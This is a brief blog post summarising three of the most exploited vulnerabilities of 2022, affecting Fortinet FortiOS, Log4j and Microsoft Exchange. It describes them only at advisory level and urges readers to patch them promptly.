By Jacqueline D.
There was a great article published the other day by BleepingComputer (link here) regarding several intelligence and cybersecurity agencies’ announcement of the most exploited vulnerabilities in 2022. You don’t need to read the article to understand this piece, but you should read it anyway! I did some digging into a few of the most concerning ones on the list that should probably be high priorities for remediation in the coming months.
Per BleepingComputer, the top vulnerability was CVE-2018-13379, a vulnerability in Fortinet’s FortiOS and FortiProxy software that was discovered in 2018(!) and patched in 2019(!!!). The issue is with the SSL VPN web portal in certain versions of the software. The vulnerability enables attackers to download particular system files without inputting proper credentials. Not only is this a problem because of the potential severity of an incident involving this, but also because this has been a known issue for more than three years and still hasn’t been patched on a whole lot of systems! This is a big one to check for and fix right now, if you can.
Looking at NIST’s description of CVE-2021-44228, this vulnerability is, while perhaps not as glaring, certainly a critical one to address as well. This one allows for remote code execution in Apache’s Log4j2 software. It is specific to Log4j-core. It does not affect other Apache logging services, and only affects particular versions. However, due to how widespread this software is and (as before) the severity of the vulnerability, this has the potential to precipitate a major incident. Therefore, it should be patched as soon as possible.
Also, we have CVE-2021-34523. This one is worth a lot of attention, for similar reasons to 44228. It is a vulnerability in Microsoft Exchange Server, which is used in a huge number of corporate systems. Further, it allows attackers to escalate privileges. Because of this, it should be considered a high priority.
For more information about these specific vulnerabilities and this topic in general, please consult the sources below. I hope the brief analysis and resources provided here help – happy hunting!
Sources:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2018-13379